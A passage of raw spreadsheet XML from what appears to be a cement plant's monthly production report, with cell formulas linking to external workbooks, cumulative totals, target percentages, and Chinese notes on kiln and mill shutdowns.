      <c r="I42" s="194">
        <f>H42+yc!I42</f>
        <v>0</v>
      </c>
      <c r="J42" s="194">
        <f>'[12]12'!$I$13</f>
        <v>0</v>
      </c>
      <c r="K42" s="194">
        <f>J42+'11'!K42</f>
        <v>0</v>
      </c>
      <c r="L42" s="194">
        <f>K42+yc!L42</f>
        <v>0</v>
      </c>
      <c r="M42" s="194">
        <f>'[12]12'!$L$13</f>
        <v>0</v>
      </c>
      <c r="N42" s="207">
        <f>(M42+M43)/50000*100</f>
        <v>0</v>
      </c>
      <c r="O42" s="200"/>
      <c r="P42" s="215"/>
      <c r="Q42" s="193" t="s">
        <v>278</v>
      </c>
      <c r="R42" s="237">
        <f>'[11]12'!$P$8</f>
        <v>14000</v>
      </c>
      <c r="S42" s="238">
        <f>'[11]12'!$Q$8</f>
        <v>8478.836</v>
      </c>
      <c r="T42" s="238">
        <f>'[11]12'!$R$8</f>
        <v>1643.7</v>
      </c>
      <c r="U42" s="234">
        <f>T42+'11'!U42</f>
        <v>6522.58</v>
      </c>
      <c r="V42" s="235">
        <f>U42+yc!V42</f>
        <v>214109.55</v>
      </c>
      <c r="W42" s="235">
        <f>'[11]12'!$V$8</f>
        <v>806</v>
      </c>
      <c r="X42" s="234">
        <f>W42+'11'!X42</f>
        <v>7012</v>
      </c>
      <c r="Y42" s="235">
        <f>X42+yc!Y42</f>
        <v>209483</v>
      </c>
      <c r="Z42" s="238">
        <f>'[11]12'!$Y$8</f>
        <v>7989.416</v>
      </c>
    </row>
    <row r="43" ht="15.75" customHeight="1" spans="1:26">
      <c r="A43" s="191"/>
      <c r="B43" s="193"/>
      <c r="C43" s="193"/>
      <c r="D43" s="206" t="s">
        <v>248</v>
      </c>
      <c r="E43" s="194"/>
      <c r="F43" s="194">
        <f>'[12]12'!$D$14</f>
        <v>0</v>
      </c>
      <c r="G43" s="225">
        <f>'[12]12'!$E$14</f>
        <v>0</v>
      </c>
      <c r="H43" s="194">
        <f>G43+'11'!H43</f>
        <v>0</v>
      </c>
      <c r="I43" s="194">
        <f>H43+yc!I43</f>
        <v>0</v>
      </c>
      <c r="J43" s="194">
        <f>'[12]12'!$I$14</f>
        <v>0</v>
      </c>
      <c r="K43" s="194">
        <f>J43+'11'!K43</f>
        <v>0</v>
      </c>
      <c r="L43" s="194">
        <f>K43+yc!L43</f>
        <v>0</v>
      </c>
      <c r="M43" s="194">
        <f>'[12]12'!$L$14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'[12]12'!$E$44</f>
        <v>0</v>
      </c>
      <c r="H44" s="194">
        <f>G44+'11'!H44</f>
        <v>0</v>
      </c>
      <c r="I44" s="194">
        <f>H44+yc!I44</f>
        <v>128550.22</v>
      </c>
      <c r="J44" s="194">
        <f>'[12]12'!$I$44</f>
        <v>0</v>
      </c>
      <c r="K44" s="194">
        <f>J44+'11'!K44</f>
        <v>0</v>
      </c>
      <c r="L44" s="194">
        <f>K44+yc!L44</f>
        <v>0</v>
      </c>
      <c r="M44" s="194">
        <f>'[12]12'!$L$15</f>
        <v>64232.78</v>
      </c>
      <c r="N44" s="195"/>
      <c r="O44" s="200"/>
      <c r="P44" s="215"/>
      <c r="Q44" s="191" t="s">
        <v>279</v>
      </c>
      <c r="R44" s="237">
        <f>'[11]12'!$P$29</f>
        <v>8000</v>
      </c>
      <c r="S44" s="238">
        <f>'[11]12'!$Q$29</f>
        <v>2299.457</v>
      </c>
      <c r="T44" s="238">
        <f>'[11]12'!$R$29</f>
        <v>1046.66</v>
      </c>
      <c r="U44" s="234">
        <f>T44+'11'!U44</f>
        <v>3735.66</v>
      </c>
      <c r="V44" s="235">
        <f>U44+yc!V44</f>
        <v>68488.828</v>
      </c>
      <c r="W44" s="235">
        <f>'[11]12'!$V$29</f>
        <v>191</v>
      </c>
      <c r="X44" s="234">
        <f>W44+'11'!X44</f>
        <v>2215</v>
      </c>
      <c r="Y44" s="235">
        <f>X44+yc!Y44</f>
        <v>68625</v>
      </c>
      <c r="Z44" s="238">
        <f>'[11]12'!$Y$29</f>
        <v>3820.117</v>
      </c>
    </row>
    <row r="45" ht="15.75" customHeight="1" spans="1:26">
      <c r="A45" s="191"/>
      <c r="B45" s="193"/>
      <c r="C45" s="193"/>
      <c r="D45" s="193" t="s">
        <v>251</v>
      </c>
      <c r="E45" s="194"/>
      <c r="F45" s="194"/>
      <c r="G45" s="225">
        <f>'[12]12'!$E$55</f>
        <v>0</v>
      </c>
      <c r="H45" s="194">
        <f>G45+'11'!H45</f>
        <v>0</v>
      </c>
      <c r="I45" s="194">
        <f>H45+yc!I45</f>
        <v>0</v>
      </c>
      <c r="J45" s="225">
        <f>'[12]12'!$I$55</f>
        <v>0</v>
      </c>
      <c r="K45" s="194">
        <f>J45+'11'!K45</f>
        <v>0</v>
      </c>
      <c r="L45" s="194">
        <f>K45+yc!L45</f>
        <v>0</v>
      </c>
      <c r="M45" s="194"/>
      <c r="N45" s="195"/>
      <c r="O45" s="200"/>
      <c r="P45" s="214"/>
      <c r="Q45" s="191" t="s">
        <v>280</v>
      </c>
      <c r="R45" s="237">
        <f>'[11]12'!$P$23</f>
        <v>0</v>
      </c>
      <c r="S45" s="238">
        <f>'[11]12'!$Q$23</f>
        <v>0</v>
      </c>
      <c r="T45" s="238">
        <f>'[11]12'!$R$23</f>
        <v>0</v>
      </c>
      <c r="U45" s="234">
        <f>'[11]12'!$S$23</f>
        <v>0</v>
      </c>
      <c r="V45" s="235">
        <f>'[11]12'!$T$23</f>
        <v>1.329</v>
      </c>
      <c r="W45" s="235">
        <f>'[11]12'!$V$23</f>
        <v>0</v>
      </c>
      <c r="X45" s="234">
        <f>'[11]12'!$W$23</f>
        <v>0</v>
      </c>
      <c r="Y45" s="235">
        <f>'[11]12'!$X$23</f>
        <v>1.329</v>
      </c>
      <c r="Z45" s="238">
        <f>'[11]12'!$Y$23</f>
        <v>0</v>
      </c>
    </row>
    <row r="46" ht="15.75" customHeight="1" spans="1:26">
      <c r="A46" s="191"/>
      <c r="B46" s="193" t="s">
        <v>253</v>
      </c>
      <c r="C46" s="193"/>
      <c r="D46" s="193"/>
      <c r="E46" s="194"/>
      <c r="F46" s="194"/>
      <c r="G46" s="194"/>
      <c r="H46" s="194">
        <f>G46+'11'!H46</f>
        <v>0</v>
      </c>
      <c r="I46" s="194">
        <f>H46+yc!I46</f>
        <v>0</v>
      </c>
      <c r="J46" s="194">
        <f>J47+J50</f>
        <v>0</v>
      </c>
      <c r="K46" s="194">
        <f>J46+'11'!K46</f>
        <v>0</v>
      </c>
      <c r="L46" s="194">
        <f>K46+yc!L46</f>
        <v>0</v>
      </c>
      <c r="M46" s="194"/>
      <c r="N46" s="195"/>
      <c r="O46" s="200"/>
      <c r="P46" s="242" t="s">
        <v>252</v>
      </c>
      <c r="Q46" s="193" t="s">
        <v>277</v>
      </c>
      <c r="R46" s="237">
        <f>'[12]12'!$P$7</f>
        <v>0</v>
      </c>
      <c r="S46" s="238">
        <f>'[12]12'!$Q$7</f>
        <v>0</v>
      </c>
      <c r="T46" s="238">
        <f>'[12]12'!$R$7</f>
        <v>0</v>
      </c>
      <c r="U46" s="234">
        <f>T46+'11'!U46</f>
        <v>0</v>
      </c>
      <c r="V46" s="234">
        <f>U46+yc!V46</f>
        <v>0</v>
      </c>
      <c r="W46" s="235">
        <f>'[12]12'!$V$7</f>
        <v>0</v>
      </c>
      <c r="X46" s="234">
        <f>W46+'11'!X46</f>
        <v>0</v>
      </c>
      <c r="Y46" s="235">
        <f>X46+yc!Y46</f>
        <v>0</v>
      </c>
      <c r="Z46" s="238">
        <f>'[12]12'!$Y$7</f>
        <v>0</v>
      </c>
    </row>
    <row r="47" ht="15.75" customHeight="1" spans="1:26">
      <c r="A47" s="191"/>
      <c r="B47" s="193" t="s">
        <v>254</v>
      </c>
      <c r="C47" s="193"/>
      <c r="D47" s="193"/>
      <c r="E47" s="194">
        <v>12000</v>
      </c>
      <c r="F47" s="194"/>
      <c r="G47" s="225"/>
      <c r="H47" s="194">
        <f>G47+'11'!H47</f>
        <v>0</v>
      </c>
      <c r="I47" s="194">
        <f>H47+yc!I47</f>
        <v>0</v>
      </c>
      <c r="J47" s="194">
        <f>SUM(J48:J49)</f>
        <v>0</v>
      </c>
      <c r="K47" s="194">
        <f>J47+'11'!K47</f>
        <v>0</v>
      </c>
      <c r="L47" s="194">
        <f>K47+yc!L47</f>
        <v>0</v>
      </c>
      <c r="M47" s="194"/>
      <c r="N47" s="195"/>
      <c r="O47" s="200"/>
      <c r="P47" s="243"/>
      <c r="Q47" s="193" t="s">
        <v>278</v>
      </c>
      <c r="R47" s="237">
        <f>'[12]12'!$P$8</f>
        <v>0</v>
      </c>
      <c r="S47" s="238">
        <f>'[12]12'!$Q$8</f>
        <v>0</v>
      </c>
      <c r="T47" s="238">
        <f>'[12]12'!$R$8</f>
        <v>0</v>
      </c>
      <c r="U47" s="234">
        <f>T47+'11'!U47</f>
        <v>0</v>
      </c>
      <c r="V47" s="234">
        <f>U47+yc!V47</f>
        <v>0</v>
      </c>
      <c r="W47" s="235">
        <f>'[12]12'!$V$8</f>
        <v>0</v>
      </c>
      <c r="X47" s="234">
        <f>W47+'11'!X47</f>
        <v>0</v>
      </c>
      <c r="Y47" s="235">
        <f>X47+yc!Y47</f>
        <v>0</v>
      </c>
      <c r="Z47" s="238">
        <f>'[12]12'!$Y$8</f>
        <v>0</v>
      </c>
    </row>
    <row r="48" ht="15.75" customHeight="1" spans="1:26">
      <c r="A48" s="191"/>
      <c r="B48" s="191" t="s">
        <v>231</v>
      </c>
      <c r="C48" s="193" t="s">
        <v>257</v>
      </c>
      <c r="D48" s="193"/>
      <c r="E48" s="194"/>
      <c r="F48" s="194"/>
      <c r="G48" s="225"/>
      <c r="H48" s="194">
        <f>G48+'11'!H48</f>
        <v>0</v>
      </c>
      <c r="I48" s="194">
        <f>H48+yc!I48</f>
        <v>0</v>
      </c>
      <c r="J48" s="194"/>
      <c r="K48" s="194">
        <f>J48+'11'!K48</f>
        <v>0</v>
      </c>
      <c r="L48" s="194">
        <f>K48+yc!L48</f>
        <v>0</v>
      </c>
      <c r="M48" s="194"/>
      <c r="N48" s="195"/>
      <c r="O48" s="200"/>
      <c r="P48" s="243"/>
      <c r="Q48" s="193" t="s">
        <v>279</v>
      </c>
      <c r="R48" s="237">
        <f>'[12]12'!$P$34</f>
        <v>0</v>
      </c>
      <c r="S48" s="238">
        <f>'[12]12'!$Q$34</f>
        <v>1585.503</v>
      </c>
      <c r="T48" s="238">
        <f>'[12]12'!$R$34</f>
        <v>0</v>
      </c>
      <c r="U48" s="234">
        <f>T48+'11'!U48</f>
        <v>300.06</v>
      </c>
      <c r="V48" s="234">
        <f>U48+yc!V48</f>
        <v>6326.59</v>
      </c>
      <c r="W48" s="235">
        <f>'[12]12'!$V$8</f>
        <v>0</v>
      </c>
      <c r="X48" s="234">
        <f>W48+'11'!X48</f>
        <v>0</v>
      </c>
      <c r="Y48" s="235">
        <f>X48+yc!Y48</f>
        <v>0</v>
      </c>
      <c r="Z48" s="238">
        <f>'[12]12'!$Y$8</f>
        <v>0</v>
      </c>
    </row>
    <row r="49" ht="15.75" customHeight="1" spans="1:26">
      <c r="A49" s="191"/>
      <c r="B49" s="191"/>
      <c r="C49" s="193" t="s">
        <v>259</v>
      </c>
      <c r="D49" s="193"/>
      <c r="E49" s="194"/>
      <c r="F49" s="194"/>
      <c r="G49" s="194"/>
      <c r="H49" s="194">
        <f>G49+'11'!H49</f>
        <v>0</v>
      </c>
      <c r="I49" s="194">
        <f>H49+yc!I49</f>
        <v>0</v>
      </c>
      <c r="J49" s="194"/>
      <c r="K49" s="194">
        <f>J49+'11'!K49</f>
        <v>0</v>
      </c>
      <c r="L49" s="194">
        <f>K49+yc!L49</f>
        <v>0</v>
      </c>
      <c r="M49" s="194"/>
      <c r="N49" s="195"/>
      <c r="O49" s="200"/>
      <c r="P49" s="197" t="s">
        <v>304</v>
      </c>
      <c r="Q49" s="193" t="s">
        <v>278</v>
      </c>
      <c r="R49" s="237">
        <f>'[13]12'!$P$8</f>
        <v>15340</v>
      </c>
      <c r="S49" s="238">
        <f>'[13]12'!$Q$8</f>
        <v>10593.625</v>
      </c>
      <c r="T49" s="238">
        <f>'[13]12'!$R$8</f>
        <v>0</v>
      </c>
      <c r="U49" s="234">
        <f>T49+'11'!U49</f>
        <v>0</v>
      </c>
      <c r="V49" s="234">
        <f>U49+yc!V49</f>
        <v>179888.95</v>
      </c>
      <c r="W49" s="235">
        <f>'[13]12'!$V$8</f>
        <v>0</v>
      </c>
      <c r="X49" s="234">
        <f>W49+'11'!X49</f>
        <v>0</v>
      </c>
      <c r="Y49" s="235">
        <f>X49+yc!Y49</f>
        <v>176530.34</v>
      </c>
      <c r="Z49" s="238">
        <f>'[13]12'!$Y$8</f>
        <v>10593.625</v>
      </c>
    </row>
    <row r="50" ht="15.75" customHeight="1" spans="1:26">
      <c r="A50" s="191"/>
      <c r="B50" s="193" t="s">
        <v>261</v>
      </c>
      <c r="C50" s="193"/>
      <c r="D50" s="193"/>
      <c r="E50" s="194"/>
      <c r="F50" s="194"/>
      <c r="G50" s="225"/>
      <c r="H50" s="194">
        <f>G50+'11'!H50</f>
        <v>0</v>
      </c>
      <c r="I50" s="194">
        <f>H50+yc!I50</f>
        <v>0</v>
      </c>
      <c r="J50" s="194"/>
      <c r="K50" s="194">
        <f>J50+'11'!K50</f>
        <v>0</v>
      </c>
      <c r="L50" s="194">
        <f>K50+yc!L50</f>
        <v>0</v>
      </c>
      <c r="M50" s="194"/>
      <c r="N50" s="195"/>
      <c r="O50" s="200"/>
      <c r="P50" s="200"/>
      <c r="Q50" s="193" t="s">
        <v>277</v>
      </c>
      <c r="R50" s="237">
        <f>'[13]12'!$P$7</f>
        <v>200</v>
      </c>
      <c r="S50" s="238">
        <f>'[13]12'!$Q$7</f>
        <v>0</v>
      </c>
      <c r="T50" s="238">
        <f>'[13]12'!$R$7</f>
        <v>0</v>
      </c>
      <c r="U50" s="234">
        <f>T50+'11'!U50</f>
        <v>0</v>
      </c>
      <c r="V50" s="234">
        <f>U50+yc!V50</f>
        <v>0</v>
      </c>
      <c r="W50" s="235">
        <f>'[13]12'!$V$7</f>
        <v>0</v>
      </c>
      <c r="X50" s="234">
        <f>W50+'11'!X50</f>
        <v>0</v>
      </c>
      <c r="Y50" s="235">
        <f>X50+yc!Y50</f>
        <v>0</v>
      </c>
      <c r="Z50" s="238">
        <f>'[13]12'!$Y$7</f>
        <v>0</v>
      </c>
    </row>
    <row r="51" ht="15.75" customHeight="1" spans="1:26">
      <c r="A51" s="191" t="s">
        <v>304</v>
      </c>
      <c r="B51" s="193" t="s">
        <v>227</v>
      </c>
      <c r="C51" s="193"/>
      <c r="D51" s="193"/>
      <c r="E51" s="194">
        <v>160000</v>
      </c>
      <c r="F51" s="194">
        <f>'[13]12'!$D$24</f>
        <v>48852.6839999998</v>
      </c>
      <c r="G51" s="225">
        <f>'[13]12'!$E$24</f>
        <v>4687</v>
      </c>
      <c r="H51" s="194">
        <f>G51+'11'!H51</f>
        <v>61096.81</v>
      </c>
      <c r="I51" s="194">
        <f>H51+yc!I51</f>
        <v>1437495.81</v>
      </c>
      <c r="J51" s="194">
        <f>'[13]12'!$I$24</f>
        <v>5257.32</v>
      </c>
      <c r="K51" s="194">
        <f>J51+'11'!K51</f>
        <v>60772.409</v>
      </c>
      <c r="L51" s="194">
        <f>K51+yc!L51</f>
        <v>1423896.34</v>
      </c>
      <c r="M51" s="194">
        <f>'[13]12'!$L$24</f>
        <v>49023.2749999998</v>
      </c>
      <c r="N51" s="195">
        <f>M51/45000*100</f>
        <v>108.940611111111</v>
      </c>
      <c r="O51" s="200"/>
      <c r="P51" s="200"/>
      <c r="Q51" s="193" t="s">
        <v>279</v>
      </c>
      <c r="R51" s="237">
        <f>'[13]12'!$P$30</f>
        <v>8550</v>
      </c>
      <c r="S51" s="238">
        <f>'[13]12'!$Q$30</f>
        <v>3251.37400000001</v>
      </c>
      <c r="T51" s="238">
        <f>'[13]12'!$R$30</f>
        <v>444.03</v>
      </c>
      <c r="U51" s="234">
        <f>T51+'11'!U51</f>
        <v>3001.33</v>
      </c>
      <c r="V51" s="234">
        <f>U51+yc!V51</f>
        <v>65999.801</v>
      </c>
      <c r="W51" s="235">
        <f>'[13]12'!$V$30</f>
        <v>193</v>
      </c>
      <c r="X51" s="234">
        <f>W51+'11'!X51</f>
        <v>2568.838</v>
      </c>
      <c r="Y51" s="235">
        <f>X51+yc!Y51</f>
        <v>63185.075</v>
      </c>
      <c r="Z51" s="238">
        <f>'[13]12'!$Y$30</f>
        <v>3683.86600000001</v>
      </c>
    </row>
    <row r="52" ht="15.75" customHeight="1" spans="1:26">
      <c r="A52" s="191"/>
      <c r="B52" s="191" t="s">
        <v>244</v>
      </c>
      <c r="C52" s="193" t="s">
        <v>245</v>
      </c>
      <c r="D52" s="193" t="s">
        <v>246</v>
      </c>
      <c r="E52" s="194">
        <v>175000</v>
      </c>
      <c r="F52" s="194">
        <f>'[13]12'!$D$19</f>
        <v>105046.44300005</v>
      </c>
      <c r="G52" s="225">
        <f>'[13]12'!$E$19</f>
        <v>2e-11</v>
      </c>
      <c r="H52" s="194">
        <f>G52+'11'!H52</f>
        <v>2.4e-10</v>
      </c>
      <c r="I52" s="194">
        <f>H52+yc!I52</f>
        <v>1383567.25</v>
      </c>
      <c r="J52" s="194">
        <f>'[13]12'!$I$19</f>
        <v>5609.357</v>
      </c>
      <c r="K52" s="194">
        <f>J52+'11'!K52</f>
        <v>60334.978</v>
      </c>
      <c r="L52" s="194">
        <f>K52+yc!L52</f>
        <v>1342029.178</v>
      </c>
      <c r="M52" s="194">
        <f>'[13]12'!$L$19</f>
        <v>44711.4650000504</v>
      </c>
      <c r="N52" s="207">
        <f>(M52+M53)/(65000+80000)*100</f>
        <v>30.8354931034831</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'[13]12'!$D$22</f>
        <v>0</v>
      </c>
      <c r="G53" s="225">
        <f>'[13]12'!$E$22</f>
        <v>0</v>
      </c>
      <c r="H53" s="194">
        <f>G53+'11'!H53</f>
        <v>0</v>
      </c>
      <c r="I53" s="194">
        <f>H53+yc!I53</f>
        <v>0</v>
      </c>
      <c r="J53" s="194">
        <f>'[13]12'!$I$22</f>
        <v>0</v>
      </c>
      <c r="K53" s="194">
        <f>J53+'11'!K53</f>
        <v>0</v>
      </c>
      <c r="L53" s="194">
        <f>K53+yc!L53</f>
        <v>0</v>
      </c>
      <c r="M53" s="194">
        <f>'[13]12'!$L$23</f>
        <v>0</v>
      </c>
      <c r="N53" s="212"/>
      <c r="O53" s="200"/>
      <c r="P53" s="223" t="s">
        <v>262</v>
      </c>
      <c r="Q53" s="193" t="s">
        <v>279</v>
      </c>
      <c r="R53" s="245"/>
      <c r="S53" s="237">
        <f>'[14]12'!$M$21+'[14]12'!$M$22+'[14]12'!$M$35</f>
        <v>1648.947</v>
      </c>
      <c r="T53" s="237">
        <f>'[14]12'!$N$21+'[14]12'!$N$22+'[14]12'!$N$35</f>
        <v>43.14</v>
      </c>
      <c r="U53" s="234">
        <f>T53+'11'!U53</f>
        <v>600.73</v>
      </c>
      <c r="V53" s="234">
        <f>U53+yc!V53</f>
        <v>38935.157</v>
      </c>
      <c r="W53" s="237">
        <f>'[14]12'!$Q$21+'[14]12'!$Q$22+'[14]12'!$Q$35</f>
        <v>0</v>
      </c>
      <c r="X53" s="234">
        <f>W53+'11'!X53</f>
        <v>627</v>
      </c>
      <c r="Y53" s="235">
        <f>X53+yc!Y53</f>
        <v>40118</v>
      </c>
      <c r="Z53" s="237">
        <f>'[14]12'!$T$21+'[14]12'!$T$22+'[14]12'!$T$35</f>
        <v>1622.677</v>
      </c>
    </row>
    <row r="54" ht="15.75" customHeight="1" spans="1:26">
      <c r="A54" s="191"/>
      <c r="B54" s="193"/>
      <c r="C54" s="193" t="s">
        <v>249</v>
      </c>
      <c r="D54" s="206" t="s">
        <v>250</v>
      </c>
      <c r="E54" s="194"/>
      <c r="F54" s="194"/>
      <c r="G54" s="225">
        <f>'[13]12'!$E$23</f>
        <v>0</v>
      </c>
      <c r="H54" s="194">
        <f>G54+'11'!H54</f>
        <v>0</v>
      </c>
      <c r="I54" s="194">
        <f>H54+yc!I54</f>
        <v>0</v>
      </c>
      <c r="J54" s="194">
        <f>'[13]12'!$I$47</f>
        <v>0</v>
      </c>
      <c r="K54" s="194">
        <f>J54+'11'!K54</f>
        <v>10672.645</v>
      </c>
      <c r="L54" s="194">
        <f>K54+yc!L54</f>
        <v>222114.495</v>
      </c>
      <c r="M54" s="194">
        <f>'[13]12'!$L$22</f>
        <v>0</v>
      </c>
      <c r="N54" s="195"/>
      <c r="O54" s="200"/>
      <c r="P54" s="246" t="s">
        <v>263</v>
      </c>
      <c r="Q54" s="242" t="s">
        <v>279</v>
      </c>
      <c r="R54" s="247">
        <f>'[15]12'!$C$43</f>
        <v>0</v>
      </c>
      <c r="S54" s="247">
        <f>'[15]12'!$D$43</f>
        <v>467.66</v>
      </c>
      <c r="T54" s="247">
        <f>'[15]12'!$E$43</f>
        <v>0</v>
      </c>
      <c r="U54" s="234">
        <f>T54+'11'!U54</f>
        <v>0</v>
      </c>
      <c r="V54" s="248">
        <f>U54+yc!V54</f>
        <v>0</v>
      </c>
      <c r="W54" s="249">
        <f>'[15]12'!$H$43</f>
        <v>0</v>
      </c>
      <c r="X54" s="234">
        <f>W54+'11'!X54</f>
        <v>0</v>
      </c>
      <c r="Y54" s="250">
        <f>X54+yc!Y54</f>
        <v>0</v>
      </c>
      <c r="Z54" s="247">
        <f>'[15]12'!$K$43</f>
        <v>467.66</v>
      </c>
    </row>
    <row r="55" ht="15.75" customHeight="1" spans="1:26">
      <c r="A55" s="191"/>
      <c r="B55" s="193"/>
      <c r="C55" s="193"/>
      <c r="D55" s="193" t="s">
        <v>251</v>
      </c>
      <c r="E55" s="194"/>
      <c r="F55" s="194"/>
      <c r="G55" s="225">
        <f>'[13]12'!$E$63</f>
        <v>0</v>
      </c>
      <c r="H55" s="194">
        <f>G55+'11'!H55</f>
        <v>0</v>
      </c>
      <c r="I55" s="194">
        <f>H55+yc!I55</f>
        <v>0</v>
      </c>
      <c r="J55" s="225">
        <f>'[13]12'!$I$63</f>
        <v>2349.357</v>
      </c>
      <c r="K55" s="194">
        <f>J55+'11'!K55</f>
        <v>4146.853</v>
      </c>
      <c r="L55" s="194">
        <f>K55+yc!L55</f>
        <v>39582.503</v>
      </c>
      <c r="M55" s="194"/>
      <c r="N55" s="195"/>
      <c r="O55" s="200"/>
      <c r="P55" s="251" t="s">
        <v>310</v>
      </c>
      <c r="Q55" s="252" t="s">
        <v>279</v>
      </c>
      <c r="R55" s="253">
        <f>'[16]12'!$P$7</f>
        <v>0</v>
      </c>
      <c r="S55" s="253">
        <f>'[16]12'!$Q$7</f>
        <v>0</v>
      </c>
      <c r="T55" s="253">
        <f>'[16]12'!$R$7</f>
        <v>0</v>
      </c>
      <c r="U55" s="254">
        <f>'[16]12'!$S$7</f>
        <v>0</v>
      </c>
      <c r="V55" s="255">
        <f>'[16]12'!$T$7</f>
        <v>0</v>
      </c>
      <c r="W55" s="256">
        <f>'[16]12'!$V$7</f>
        <v>0</v>
      </c>
      <c r="X55" s="254">
        <f>'[16]12'!$W$7</f>
        <v>0</v>
      </c>
      <c r="Y55" s="257">
        <f>'[16]12'!$X$7</f>
        <v>0</v>
      </c>
      <c r="Z55" s="253">
        <f>'[16]12'!$Y$7</f>
        <v>0</v>
      </c>
    </row>
    <row r="56" ht="15.75" customHeight="1" spans="1:26">
      <c r="A56" s="191"/>
      <c r="B56" s="193" t="s">
        <v>253</v>
      </c>
      <c r="C56" s="193"/>
      <c r="D56" s="193"/>
      <c r="E56" s="194"/>
      <c r="F56" s="194"/>
      <c r="G56" s="194"/>
      <c r="H56" s="194">
        <f>G56+'11'!H56</f>
        <v>0</v>
      </c>
      <c r="I56" s="194">
        <f>H56+yc!I56</f>
        <v>0</v>
      </c>
      <c r="J56" s="194">
        <f>J57+J60</f>
        <v>0</v>
      </c>
      <c r="K56" s="194">
        <f>J56+'11'!K56</f>
        <v>0</v>
      </c>
      <c r="L56" s="194">
        <f>K56+yc!L56</f>
        <v>0</v>
      </c>
      <c r="M56" s="194"/>
      <c r="N56" s="195"/>
      <c r="O56" s="258" t="s">
        <v>282</v>
      </c>
      <c r="P56" s="259" t="s">
        <v>229</v>
      </c>
      <c r="Q56" s="260" t="str">
        <f>'[8]12'!$Q$62</f>
        <v>1#窑:续停。2#窑:续停。水泥磨:1#磨：10:00-22:10避峰停机；2#磨：9:30-22:10避峰停机；3#磨：大修续停；4#磨：15:00-22:10避峰停机。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G57+'11'!H57</f>
        <v>0</v>
      </c>
      <c r="I57" s="194">
        <f>H57+yc!I57</f>
        <v>0</v>
      </c>
      <c r="J57" s="194">
        <f>SUM(J58:J59)</f>
        <v>0</v>
      </c>
      <c r="K57" s="194">
        <f>J57+'11'!K57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G58+'11'!H58</f>
        <v>0</v>
      </c>
      <c r="I58" s="194">
        <f>H58+yc!I58</f>
        <v>0</v>
      </c>
      <c r="J58" s="194"/>
      <c r="K58" s="194">
        <f>J58+'11'!K58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G59+'11'!H59</f>
        <v>0</v>
      </c>
      <c r="I59" s="194">
        <f>H59+yc!I59</f>
        <v>0</v>
      </c>
      <c r="J59" s="194"/>
      <c r="K59" s="194">
        <f>J59+'11'!K59</f>
        <v>0</v>
      </c>
      <c r="L59" s="194">
        <f>K59+yc!L59</f>
        <v>0</v>
      </c>
      <c r="M59" s="194"/>
      <c r="N59" s="195"/>
      <c r="O59" s="263"/>
      <c r="P59" s="264" t="s">
        <v>237</v>
      </c>
      <c r="Q59" s="271" t="str">
        <f>'[8]12'!$Q$65</f>
        <v>窑:正常。A组磨：9:30-24:00避峰停机。D1#磨：正常，D2#磨：正常。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G60+'11'!H60</f>
        <v>0</v>
      </c>
      <c r="I60" s="194">
        <f>H60+yc!I60</f>
        <v>0</v>
      </c>
      <c r="J60" s="194"/>
      <c r="K60" s="194">
        <f>J60+'11'!K60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'[14]12'!$D$6</f>
        <v>37769.1699999999</v>
      </c>
      <c r="G61" s="225">
        <f>'[14]12'!$E$6</f>
        <v>3394</v>
      </c>
      <c r="H61" s="194">
        <f>G61+'11'!H61</f>
        <v>42817</v>
      </c>
      <c r="I61" s="194">
        <f>H61+yc!I61</f>
        <v>1158690</v>
      </c>
      <c r="J61" s="194">
        <f>'[14]12'!$E$21</f>
        <v>3666.13</v>
      </c>
      <c r="K61" s="194">
        <f>J61+'11'!K61</f>
        <v>46645.35</v>
      </c>
      <c r="L61" s="194">
        <f>K61+yc!L61</f>
        <v>1147805.43</v>
      </c>
      <c r="M61" s="194">
        <f>'[14]12'!$H$6</f>
        <v>33940.8199999999</v>
      </c>
      <c r="N61" s="195">
        <f>M61/52000*100</f>
        <v>65.2708076923075</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'[14]12'!$M$11+'[14]12'!$M$12+'[14]12'!$M$13+'[14]12'!$M$14+'[14]12'!$M$15+'[14]12'!$M$16+'[14]12'!$M$17+'[14]12'!$M$18</f>
        <v>18454.634</v>
      </c>
      <c r="G62" s="225">
        <f>'[14]12'!$N$11+'[14]12'!$N$12+'[14]12'!$N$13+'[14]12'!$N$14+'[14]12'!$N$15+'[14]12'!$N$16+'[14]12'!$N$17+'[14]12'!$N$18</f>
        <v>670</v>
      </c>
      <c r="H62" s="194">
        <f>G62+'11'!H62</f>
        <v>28475</v>
      </c>
      <c r="I62" s="194">
        <f>H62+yc!I62</f>
        <v>864468.456</v>
      </c>
      <c r="J62" s="194">
        <f>'[14]12'!$Q$11+'[14]12'!$Q$12+'[14]12'!$Q$13+'[14]12'!$Q$14+'[14]12'!$Q$15+'[14]12'!$Q$16+'[14]12'!$Q$17+'[14]12'!$Q$18</f>
        <v>2444</v>
      </c>
      <c r="K62" s="194">
        <f>J62+'11'!K62</f>
        <v>30829</v>
      </c>
      <c r="L62" s="194">
        <f>K62+yc!L62</f>
        <v>865301.796</v>
      </c>
      <c r="M62" s="194">
        <f>'[14]12'!$T$11+'[14]12'!$T$12+'[14]12'!$T$13+'[14]12'!$T$14+'[14]12'!$T$15+'[14]12'!$T$16+'[14]12'!$T$17+'[14]12'!$T$18</f>
        <v>16100.634</v>
      </c>
      <c r="N62" s="207">
        <f>(M62+M63)/25000*100</f>
        <v>64.4025359999998</v>
      </c>
      <c r="O62" s="263"/>
      <c r="P62" s="274" t="s">
        <v>252</v>
      </c>
      <c r="Q62" s="271" t="str">
        <f>'[8]12'!$Q$71</f>
        <v>窑:续停。水泥磨:续停。</v>
      </c>
      <c r="R62" s="272"/>
      <c r="S62" s="272"/>
      <c r="T62" s="272"/>
      <c r="U62" s="272"/>
      <c r="V62" s="272"/>
      <c r="W62" s="272"/>
      <c r="X62" s="272"/>
      <c r="Y62" s="272"/>
      <c r="Z62" s="273"/>
    </row>
    <row r="63" ht="15.75" customHeight="1" spans="1:26">
      <c r="A63" s="191"/>
      <c r="B63" s="193"/>
      <c r="C63" s="193"/>
      <c r="D63" s="193" t="s">
        <v>284</v>
      </c>
      <c r="E63" s="194"/>
      <c r="F63" s="194">
        <f>'[14]12'!$M$19+'[14]12'!$M$20</f>
        <v>-2.00373051484348e-12</v>
      </c>
      <c r="G63" s="225">
        <f>'[14]12'!$N$19+'[14]12'!$N$20</f>
        <v>0</v>
      </c>
      <c r="H63" s="194">
        <f>G63+'11'!H63</f>
        <v>0</v>
      </c>
      <c r="I63" s="194">
        <f>H63+yc!I63</f>
        <v>0</v>
      </c>
      <c r="J63" s="194">
        <f>'[14]12'!$Q$19+'[14]12'!$Q$20</f>
        <v>0</v>
      </c>
      <c r="K63" s="194">
        <f>J63+'11'!K63</f>
        <v>0</v>
      </c>
